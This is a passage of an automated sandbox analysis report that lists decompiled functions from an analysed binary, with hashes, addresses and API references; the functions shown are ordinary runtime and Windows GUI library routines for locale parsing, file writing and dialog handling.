                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$DesktopMoveShowVisible
                                                                              • String ID:
                                                                              • API String ID: 3835705305-0
                                                                              • Opcode ID: d773adab089a3fe7c9c66bc4d4f68c143d7e0cd7b6ea670bf85cb4ee9fbe8775
                                                                              • Instruction ID: aef8f7b5d96eaed2791679fdc5685ee1f7111264cda5d13848339e02a6c6130a
                                                                              • Opcode Fuzzy Hash: d773adab089a3fe7c9c66bc4d4f68c143d7e0cd7b6ea670bf85cb4ee9fbe8775
                                                                              • Instruction Fuzzy Hash: B3510975A0021AEFDB10DFA8D984DAEB7B9FF48304B14446EF506E7290CB79AD05CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00415EFB, Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E00415EFB(void* __ebx, char* __ecx, signed int __edx, void* __edi, void* __esi) {
				void* __ebp;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t42;
				intOrPtr _t43;
				signed int _t46;
				char* _t47;
				signed int _t48;
				void* _t49;
				void* _t54;
				void* _t55;
				intOrPtr* _t60;
				char* _t61;
				char* _t62;
				void* _t66;
				void* _t70;
				void* _t72;
				void* _t80;
				char* _t81;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				void* _t89;
				void* _t91;
				void* _t92;

				_t89 = _t91 - 0x78;
				_t92 = _t91 - 0x94;
				_t35 =  *0x457184; // 0xb7aa1229
				_push(__ebx);
				_push(__esi);
				_t83 = __edx;
				_push(__edi);
				 *((intOrPtr*)(_t89 + 0x74)) = _t35;
				_t76 = __ecx;
				if(__edx == 0) {
					 *(_t89 - 0x18) = 1;
					 *((intOrPtr*)(_t89 - 0x14)) = 0;
					if(__ecx == 0) {
						L24:
						_t36 = E00415A51();
						L25:
						_t84 = _t36;
						L26:
						_t37 = _t84;
						L27:
						return E00412FBB(_t37,  *((intOrPtr*)(_t89 + 0x74)));
					}
					if( *__ecx != 0x4c ||  *((char*)(__ecx + 1)) != 0x43 ||  *((char*)(__ecx + 2)) != 0x5f) {
						_push(0);
						_t84 = E00415B10(0, _t76, _t83, _t76, _t89 - 0x10, 0, 0);
						if(_t84 == 0) {
							goto L26;
						}
						_t86 = 0;
						_t60 = 0x4576cc;
						do {
							if(_t60 == 0x4576cc) {
								goto L36;
							}
							_t42 = E00416EE0(_t89 - 0x10,  *_t60);
							_pop(_t66);
							if(_t42 == 0) {
								L35:
								 *((intOrPtr*)(_t89 - 0x14)) =  *((intOrPtr*)(_t89 - 0x14)) + 1;
								goto L36;
							}
							_push(_t89 - 0x10);
							_t46 = E00415C6C(_t60, _t66, 0x4576cc, _t86);
							if(_t46 != 0) {
								goto L35;
							}
							 *(_t89 - 0x18) =  *(_t89 - 0x18) & _t46;
							L36:
							_t60 = _t60 + 0xc;
							_t86 = _t86 + 1;
						} while (_t60 <= 0x457708);
						if( *(_t89 - 0x18) == 0) {
							if( *((intOrPtr*)(_t89 - 0x14)) != 0) {
								goto L24;
							}
							_t84 = 0;
							goto L26;
						}
						_t43 = E00415A51();
						_push( *0x4576cc);
						_t84 = _t43;
						E00412A4D();
						 *0x4576cc = 0;
						goto L26;
					} else {
						while(1) {
							L8:
							_t47 = E0041ACD0(_t76, 0x44bf18);
							_t61 = _t47;
							_pop(_t70);
							if(_t61 == 0) {
								break;
							}
							_t48 = _t47 - _t76;
							 *(_t89 - 0x18) = _t48;
							if(_t48 == 0 ||  *_t61 == 0x3b) {
								break;
							} else {
								 *(_t89 - 0x1c) = 1;
								_t87 = 0x4576d4;
								while(1) {
									_t49 = E0041AC90( *_t87, _t76, _t48);
									_t92 = _t92 + 0xc;
									if(_t49 != 0) {
										goto L15;
									}
									L14:
									_t55 = E00411A30( *_t87);
									_pop(_t70);
									if( *(_t89 - 0x18) == _t55) {
										L16:
										_t62 = _t61 + 1;
										_t80 = E00419CA0(_t70, _t62, 0x44a9dc);
										_pop(_t72);
										if(_t80 != 0 ||  *_t62 == 0x3b) {
											_t88 =  *(_t89 - 0x1c);
											if( *(_t89 - 0x1c) <= 5) {
												E0041ADB0(_t89 - 0x10, _t62, _t80);
												_push(_t89 - 0x10);
												 *((char*)(_t89 + _t80 - 0x10)) = 0;
												_t54 = E00415C6C(_t62, _t72, _t80, _t88);
												_t92 = _t92 + 0x10;
												if(_t54 != 0) {
													 *((intOrPtr*)(_t89 - 0x14)) =  *((intOrPtr*)(_t89 - 0x14)) + 1;
												}
											}
											_t81 = _t80 + _t62;
											if( *_t81 == 0) {
												L23:
												_t84 = 0;
												if( *((intOrPtr*)(_t89 - 0x14)) == 0) {
													goto L26;
												}
												goto L24;
											} else {
												_t76 = _t81 + 1;
												if( *_t76 != 0) {
													goto L8;
												}
												goto L23;
											}
										} else {
											goto L28;
										}
									}
									L15:
									 *(_t89 - 0x1c) =  *(_t89 - 0x1c) + 1;
									_t87 = _t87 + 0xc;
									if(_t87 <= 0x457704) {
										_t48 =  *(_t89 - 0x18);
										_t49 = E0041AC90( *_t87, _t76, _t48);
										_t92 = _t92 + 0xc;
										if(_t49 != 0) {
											goto L15;
										}
										goto L14;
									}
									goto L16;
								}
							}
						}
						L28:
						_t37 = 0;
						goto L27;
					}
				}
				if(__ecx == 0) {
					_t84 =  *((intOrPtr*)(0x4576cc + (__edx + __edx * 2) * 4));
					goto L26;
				}
				_push(__ecx);
				_t36 = E00415C6C(0, __ecx, __ecx, __edx);
				goto L25;
			}





























                                                                              0x00415efc
                                                                              0x00415f00
                                                                              0x00415f06
                                                                              0x00415f0b
                                                                              0x00415f0c
                                                                              0x00415f0d
                                                                              0x00415f13
                                                                              0x00415f14
                                                                              0x00415f17
                                                                              0x00415f19
                                                                              0x00415f3c
                                                                              0x00415f43
                                                                              0x00415f46
                                                                              0x0041602c
                                                                              0x0041602c
                                                                              0x00416031
                                                                              0x00416031
                                                                              0x00416033
                                                                              0x00416033
                                                                              0x00416035
                                                                              0x00416044
                                                                              0x00416044
                                                                              0x00415f4f
                                                                              0x00416049
                                                                              0x00416056
                                                                              0x0041605d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416064
                                                                              0x00416066
                                                                              0x00416068
                                                                              0x0041606a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416072
                                                                              0x0041607a
                                                                              0x0041607b
                                                                              0x00416090
                                                                              0x00416090
                                                                              0x00000000
                                                                              0x00416090
                                                                              0x00416080
                                                                              0x00416081
                                                                              0x00416089
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041608b
                                                                              0x00416093
                                                                              0x00416093
                                                                              0x00416096
                                                                              0x00416097
                                                                              0x004160a4
                                                                              0x004160c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004160cd
                                                                              0x00000000
                                                                              0x004160cd
                                                                              0x004160a6
                                                                              0x004160ab
                                                                              0x004160b1
                                                                              0x004160b3
                                                                              0x004160b9
                                                                              0x00000000
                                                                              0x00415f69
                                                                              0x00415f69
                                                                              0x00415f69
                                                                              0x00415f6f
                                                                              0x00415f74
                                                                              0x00415f79
                                                                              0x00415f7a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415f80
                                                                              0x00415f82
                                                                              0x00415f85
                                                                              0x00000000
                                                                              0x00415f94
                                                                              0x00415f94
                                                                              0x00415f9b
                                                                              0x00415fa5
                                                                              0x00415fa9
                                                                              0x00415fae
                                                                              0x00415fb3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415fb5
                                                                              0x00415fb7
                                                                              0x00415fbf
                                                                              0x00415fc0
                                                                              0x00415fd0
                                                                              0x00415fd0
                                                                              0x00415fdc
                                                                              0x00415fe1
                                                                              0x00415fe2
                                                                              0x00415fe9
                                                                              0x00415fef
                                                                              0x00415ff7
                                                                              0x00415fff
                                                                              0x00416000
                                                                              0x00416005
                                                                              0x0041600a
                                                                              0x0041600f
                                                                              0x00416011
                                                                              0x00416011
                                                                              0x0041600f
                                                                              0x00416014
                                                                              0x00416019
                                                                              0x00416025
                                                                              0x00416025
                                                                              0x0041602a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041601b
                                                                              0x0041601b
                                                                              0x0041601f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041601f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415fe2
                                                                              0x00415fc2
                                                                              0x00415fc2
                                                                              0x00415fc5
                                                                              0x00415fce
                                                                              0x00415fa2
                                                                              0x00415fa9
                                                                              0x00415fae
                                                                              0x00415fb3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415fb3
                                                                              0x00000000
                                                                              0x00415fce
                                                                              0x00415fa5
                                                                              0x00415f85
                                                                              0x00416045
                                                                              0x00416045
                                                                              0x00000000
                                                                              0x00416045
                                                                              0x00415f4f
                                                                              0x00415f1d
                                                                              0x00415f2e
                                                                              0x00000000
                                                                              0x00415f2e
                                                                              0x00415f1f
                                                                              0x00415f20
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcspn_strlen_strncpy_strpbrk
                                                                              • String ID:
                                                                              • API String ID: 635841138-0
                                                                              • Opcode ID: e19c258571297ee5d62cbf7ff9b59757b7ff0b38a4be4591f85e023f3adecf67
                                                                              • Instruction ID: 694c5e4b68b2525d694b7d296c557faaa049b66dd6c3df7d1911cec21b6ecaf4
                                                                              • Opcode Fuzzy Hash: e19c258571297ee5d62cbf7ff9b59757b7ff0b38a4be4591f85e023f3adecf67
                                                                              • Instruction Fuzzy Hash: 1E51FB72D046169EDF31DBA8D8806FF7BA89B48355F26003FD90092202E77DCDC18799
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C951, Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041C951(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x457184; // 0xb7aa1229
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x45bb20 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0041DE46(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E004141FA())) = 0x1c;
								_t81 = E00414203();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E0041420C( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E004141FA())) = 9;
									_t81 = E00414203();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E00412FBB(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}






















                                                                              0x0041c952
                                                                              0x0041c95f
                                                                              0x0041c965
                                                                              0x0041c96d
                                                                              0x0041c973
                                                                              0x0041c976
                                                                              0x0041c979
                                                                              0x0041c999
                                                                              0x0041c9a2
                                                                              0x0041c9a5
                                                                              0x0041c9aa
                                                                              0x0041c9b6
                                                                              0x0041c9bb
                                                                              0x0041c9c0
                                                                              0x0041c9c2
                                                                              0x0041c9c6
                                                                              0x0041caac
                                                                              0x0041cab2
                                                                              0x0041cab4
                                                                              0x0041cac7
                                                                              0x0041cab6
                                                                              0x0041cab9
                                                                              0x0041cabc
                                                                              0x0041cabc
                                                                              0x0041c9cc
                                                                              0x0041c9cc
                                                                              0x0041c9d8
                                                                              0x0041c9db
                                                                              0x0041c9de
                                                                              0x0041cad7
                                                                              0x0041cad7
                                                                              0x0041cad9
                                                                              0x0041cade
                                                                              0x0041caef
                                                                              0x0041caf4
                                                                              0x0041cafa
                                                                              0x0041caff
                                                                              0x0041cb01
                                                                              0x0041cb01
                                                                              0x0041cb09
                                                                              0x00000000
                                                                              0x0041cb0a
                                                                              0x0041cae6
                                                                              0x0041cae9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041caeb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c9e4
                                                                              0x0041c9e4
                                                                              0x0041c9e7
                                                                              0x0041c9e7
                                                                              0x0041c9ed
                                                                              0x0041c9f0
                                                                              0x0041c9f3
                                                                              0x0041c9f3
                                                                              0x0041c9f9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c9fe
                                                                              0x0041ca01
                                                                              0x0041ca03
                                                                              0x0041ca04
                                                                              0x0041ca07
                                                                              0x0041ca09
                                                                              0x0041ca0c
                                                                              0x0041ca0f
                                                                              0x0041ca10
                                                                              0x0041ca10
                                                                              0x0041ca10
                                                                              0x0041ca10
                                                                              0x0041ca13
                                                                              0x0041ca15
                                                                              0x0041ca16
                                                                              0x0041ca19
                                                                              0x0041ca19
                                                                              0x0041ca27
                                                                              0x0041ca39
                                                                              0x0041ca3f
                                                                              0x0041ca41
                                                                              0x0041ca68
                                                                              0x0041ca6b
                                                                              0x0041ca6b
                                                                              0x0041ca6b
                                                                              0x0041ca6d
                                                                              0x0041ca6d
                                                                              0x0041ca70
                                                                              0x0041ca72
                                                                              0x0041cb06
                                                                              0x0041cb06
                                                                              0x00000000
                                                                              0x0041cb06
                                                                              0x0041ca78
                                                                              0x0041ca7b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ca7f
                                                                              0x0041ca80
                                                                              0x0041ca83
                                                                              0x0041cacf
                                                                              0x0041ca85
                                                                              0x0041ca8a
                                                                              0x0041ca90
                                                                              0x0041ca95
                                                                              0x0041ca95
                                                                              0x00000000
                                                                              0x0041ca83
                                                                              0x0041ca43
                                                                              0x0041ca46
                                                                              0x0041ca49
                                                                              0x0041ca4b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ca56
                                                                              0x0041ca58
                                                                              0x0041ca58
                                                                              0x0041ca60
                                                                              0x00000000
                                                                              0x0041c97b
                                                                              0x0041c97b
                                                                              0x0041cb0b
                                                                              0x0041cb1e
                                                                              0x0041cb1e

                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0041CA39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 8ebb063f3d866f9ad221dbab5504306a6d2adffb96bdd848906d3512f42142ed
                                                                              • Instruction ID: 9b7bc8997f4c9871630646bb4369b77f4a0b577739990f79f079e00e1d6e7872
                                                                              • Opcode Fuzzy Hash: 8ebb063f3d866f9ad221dbab5504306a6d2adffb96bdd848906d3512f42142ed
                                                                              • Instruction Fuzzy Hash: 81517971940248CFCB22CFA9DC81BEEBBB8FF45744F20015AE8559B252D7749A81CF15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004297D0, Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004297D0(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x457184; // 0xb7aa1229
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E00429643(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E004296C2(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E0041229D(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E00411E00(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E00411E00(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E00412FBB(_t74, _v8);
			}





















                                                                              0x004297d6
                                                                              0x004297e1
                                                                              0x004297e4
                                                                              0x004297e7
                                                                              0x004297fa
                                                                              0x00429808
                                                                              0x00429810
                                                                              0x00429825
                                                                              0x00429827
                                                                              0x0042982a
                                                                              0x00429832
                                                                              0x0042982c
                                                                              0x0042982c
                                                                              0x0042982c
                                                                              0x00429841
                                                                              0x00429861
                                                                              0x00429864
                                                                              0x0042986a
                                                                              0x0042986f
                                                                              0x00429871
                                                                              0x0042987d
                                                                              0x0042987d
                                                                              0x00429881
                                                                              0x00429884
                                                                              0x00429888
                                                                              0x0042988c
                                                                              0x0042988f
                                                                              0x00429896
                                                                              0x00429899
                                                                              0x004298a1
                                                                              0x0042989b
                                                                              0x0042989b
                                                                              0x0042989b
                                                                              0x004298a8
                                                                              0x004298ba
                                                                              0x004298bf
                                                                              0x004298bf
                                                                              0x004298c9
                                                                              0x004298d9
                                                                              0x004298de
                                                                              0x004298e9
                                                                              0x004298ec
                                                                              0x004298f2
                                                                              0x004298f8
                                                                              0x00429843
                                                                              0x00429843
                                                                              0x00429843
                                                                              0x004297e9
                                                                              0x004297e9
                                                                              0x004297e9
                                                                              0x00429905

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalLocklstrlen
                                                                              • String ID:
                                                                              • API String ID: 1144527523-0
                                                                              • Opcode ID: 29ddfb22baa628da98e68220e70986c6928251943950cc1292bd65acfbf16da3
                                                                              • Instruction ID: 452fcb5b433e365645a6f424daf5e7e636f50435a02cce441dbc97542f236fcc
                                                                              • Opcode Fuzzy Hash: 29ddfb22baa628da98e68220e70986c6928251943950cc1292bd65acfbf16da3
                                                                              • Instruction Fuzzy Hash: 7D410131A0022AEFCB14EFA4D98489EBBB9FF04344F14812AE816D7281DB78D945CB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004288C0, Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E004288C0(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E0042317D( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E00409D70( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E00409D70( &_a4)));
								_v8 =  *((intOrPtr*)(E00409D70( &_a4)));
								if((E00428511(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E00409A88( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E00409A88( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E00428511(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                              0x004288c3
                                                                              0x004288c4
                                                                              0x004288c7
                                                                              0x004288ce
                                                                              0x004288d4
                                                                              0x004288d9
                                                                              0x004288e9
                                                                              0x00428902
                                                                              0x0042890a
                                                                              0x00428912
                                                                              0x00428915
                                                                              0x0042891f
                                                                              0x00428960
                                                                              0x00428935
                                                                              0x00428939
                                                                              0x00428946
                                                                              0x00000000
                                                                              0x00428948
                                                                              0x00428948
                                                                              0x0042894e
                                                                              0x00000000
                                                                              0x004289bb
                                                                              0x004289bb
                                                                              0x004289bb
                                                                              0x00000000
                                                                              0x004289bb
                                                                              0x0042894e
                                                                              0x00000000
                                                                              0x00428946
                                                                              0x0042896b
                                                                              0x00428975
                                                                              0x004289b4
                                                                              0x0042898b
                                                                              0x00428990
                                                                              0x00428993
                                                                              0x004289a8
                                                                              0x004289a8
                                                                              0x004289b2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00428995
                                                                              0x004289a3
                                                                              0x00000000
                                                                              0x004289a5
                                                                              0x004289a5
                                                                              0x00000000
                                                                              0x004289a5
                                                                              0x004289a3
                                                                              0x00000000
                                                                              0x00428993
                                                                              0x004288eb
                                                                              0x004288f4
                                                                              0x004288f9
                                                                              0x004288fc
                                                                              0x004289be
                                                                              0x004289c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004288fc
                                                                              0x004289c9
                                                                              0x004289c9
                                                                              0x004288d9
                                                                              0x004289cd

                                                                              APIs
                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004288F4
                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00428959
                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0042899E
                                                                              • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004289C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
